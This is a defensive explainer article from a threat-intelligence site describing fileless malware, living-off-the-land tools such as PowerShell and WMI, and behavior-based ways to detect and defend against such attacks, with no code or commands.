TI News Feed · Threat Intelligence Guides
View live threat intel feed →
TI News FeedThreat Intelligence Guides & ResourcesView Live Feed →
Attacks

What Is Fileless Malware? How It Works & How to Detect It

Fileless malware leaves almost nothing on disk — it runs in memory and abuses trusted system tools like PowerShell, so traditional antivirus has nothing to scan. Here's how it works.

By TI News Feed Editorial Team8 min readPublished Updated

Reviewed & fact-checked against primary sources by the TI News Feed Editorial Team. See our editorial & corrections policy.

Fileless malware is malicious activity that operates without writing a traditional malware file to disk. Instead of dropping an executable that antivirus can scan, it runs in a computer's memory (RAM) and abuses legitimate, trusted tools already built into the operating system to carry out its goals. Because there's little or no file for signature-based antivirus to find, fileless attacks are far stealthier than conventional malware — and they've become a favorite technique of sophisticated attackers.

In short: fileless malware doesn't bring its own weapons — it picks up the tools already lying around your system and turns them against you. This approach is often called "living off the land."

Why "fileless"?

Traditional antivirus works largely by scanning files on disk and comparing them against known malware signatures. Fileless malware sidesteps this entirely by never creating a recognizable malicious file. The term is slightly loose — some fileless attacks leave minor traces, such as a registry entry for persistence — but the defining idea is the same: there's no malware executable sitting on disk for a scanner to catch. The malicious logic lives in memory and in the misuse of legitimate processes.

How fileless attacks work

A typical fileless attack chain looks like this:

  1. Entry. The attacker gains a foothold — often through a phishing document with a malicious macro, or by exploiting a vulnerability in a browser or application.
  2. Execution in memory. Rather than dropping a file, the attack launches malicious code directly in memory, frequently by invoking a trusted scripting tool.
  3. Living off the land. It abuses legitimate system binaries and tools — collectively called LOLBins ("living-off-the-land binaries") — such as PowerShell, Windows Management Instrumentation (WMI), and other built-in utilities. Because these tools are signed, trusted, and used constantly by administrators, their activity blends into normal operations.
  4. Persistence (optional). To survive a reboot, the malware may hide a small loader in the Windows Registry or a scheduled task, then re-launch its in-memory payload.
  5. Objective. From there it can steal credentials, move laterally, or deploy further payloads like ransomware.

Why fileless malware is hard to detect

  • Nothing to scan. Signature-based antivirus looks for malicious files; there often aren't any.
  • It uses trusted tools. Blocking PowerShell or WMI outright isn't practical — administrators rely on them — so attackers hide in legitimate, expected activity.
  • It's volatile. Memory-resident code can vanish on reboot, taking forensic evidence with it.
  • It climbs the Pyramid of Pain. Because it relies on techniques rather than fixed file hashes, fileless malware sits high on the Pyramid of Pain — there's no simple indicator to block.

How to detect fileless malware

If you can't scan for files, you have to watch behavior. Effective approaches include:

  • Behavior-based EDR. Modern endpoint detection and response focuses on what processes do — flagging, for example, a Word document spawning PowerShell that connects to the internet, which is almost never legitimate.
  • Memory analysis. Inspecting RAM can reveal malicious code that exists nowhere on disk — a core technique in malware analysis, where YARA rules can be run against memory.
  • Script and command-line logging. Enabling detailed PowerShell and process-creation logging exposes the suspicious commands fileless attacks rely on.
  • Mapping to MITRE ATT&CK. Fileless techniques map cleanly to MITRE ATT&CK tactics, giving hunters concrete behaviors to search for.
  • Threat hunting. Proactive threat hunting for anomalous use of legitimate tools catches what automated defenses miss.

How to defend against fileless attacks

  • Reduce the attack surface. Disable or restrict macros, and constrain scripting tools like PowerShell (for example, with constrained language mode and application control).
  • Patch aggressively. Closing the vulnerabilities used for initial entry stops many fileless attacks before they start.
  • Apply least privilege. Limiting what users and processes can do contains an attack that does get in.
  • Enable rich logging so that in-memory and command-line activity is visible to your SIEM and hunters.
  • Train users to resist the phishing lures that so often start the chain.

Common living-off-the-land tools (LOLBins)

Fileless attacks lean on a recurring set of legitimate, built-in utilities. Recognizing them is the first step to spotting their abuse:

  • PowerShell — the most heavily abused tool, able to download and run code entirely in memory.
  • Windows Management Instrumentation (WMI) — used for execution, persistence, and lateral movement.
  • The Windows Registry — a hiding place for small loaders that re-launch in-memory payloads after reboot.
  • Scheduled tasks — abused to gain persistence without dropping an obvious file.
  • Signed system binaries such as mshta, rundll32, and regsvr32 — trusted executables coerced into running malicious code.

The defining challenge is that every one of these has a legitimate, daily use by system administrators. You can't simply block them — you have to distinguish normal use from malicious use, which is fundamentally a behavioral problem rather than a signature one.

Fileless vs traditional malware

The contrast is sharp. Traditional malware drops a file on disk, which gives defenders something concrete to scan, hash, blocklist, and quarantine. Fileless malware deliberately avoids that artifact, living in memory and trusted tools, so the usual file-based defenses have nothing to grab onto. Traditional malware often persists as an obvious program; fileless malware may leave only a tiny registry loader or nothing at all after a reboot. The upshot is that the techniques that reliably catch conventional malware — signature scanning, file reputation — are exactly the ones fileless attacks are designed to evade, which is why the entire defensive model has to shift toward behavior.

Where threat intelligence fits

Because fileless malware relies on techniques rather than easily blocked files, knowing which techniques attackers are using is what makes detection possible. Threat intelligence describes the living-off-the-land methods, abused binaries, and behavioral patterns seen in active campaigns, giving defenders the specific behaviors to hunt for. This is intelligence centered on TTPs — the most durable and valuable layer of detection.

The bottom line

Fileless malware runs in memory and abuses trusted built-in tools — "living off the land" — so it leaves little or nothing on disk for traditional antivirus to catch. That stealth, plus its reliance on techniques rather than fixed indicators, makes it one of the hardest threats to detect and a staple of sophisticated attacks. Defense shifts from scanning files to watching behavior: EDR, memory and script logging, ATT&CK-mapped hunting, attack-surface reduction, and patching. To track the techniques attackers are using right now, follow our live threat intelligence feed, aggregated from dozens of authoritative sources.

Frequently asked questions

What is fileless malware?

Fileless malware is malicious activity that runs in a computer's memory and abuses legitimate built-in system tools instead of writing a traditional malware file to disk. Because there's little or no file to scan, it evades signature-based antivirus and is far stealthier than conventional malware.

What does 'living off the land' mean?

Living off the land means abusing legitimate, trusted tools already present on a system — like PowerShell and WMI, collectively called LOLBins (living-off-the-land binaries) — to carry out an attack. Because these tools are signed and commonly used, their malicious use blends into normal activity.

How do you detect fileless malware?

Watch behavior rather than files: use behavior-based EDR, memory analysis, detailed PowerShell and process-creation logging, mapping of activity to MITRE ATT&CK techniques, and proactive threat hunting for anomalous use of legitimate tools.

Why is fileless malware so hard to stop?

There's often no malicious file to scan, it hides inside trusted tools that can't simply be blocked, memory-resident code can disappear on reboot, and it relies on techniques rather than fixed file hashes — so there's no simple indicator to block.

How do you defend against fileless attacks?

Reduce the attack surface (restrict macros and scripting tools, use application control), patch aggressively to block initial entry, apply least privilege, enable rich logging for visibility, and train users against the phishing lures that typically begin the attack.

Primary sources & further reading

This guide is reviewed and fact-checked against authoritative primary sources:

Related threat intel guides

AttacksWhat Is Malware? The Main Types ExplainedAttacksWhat Is a Rootkit? How Rootkits Work, Their Types & DetectionOperationsWhat Is EDR? Endpoint Detection and Response ExplainedDetectionWhat Are YARA Rules? A Practical Guide to Malware Detection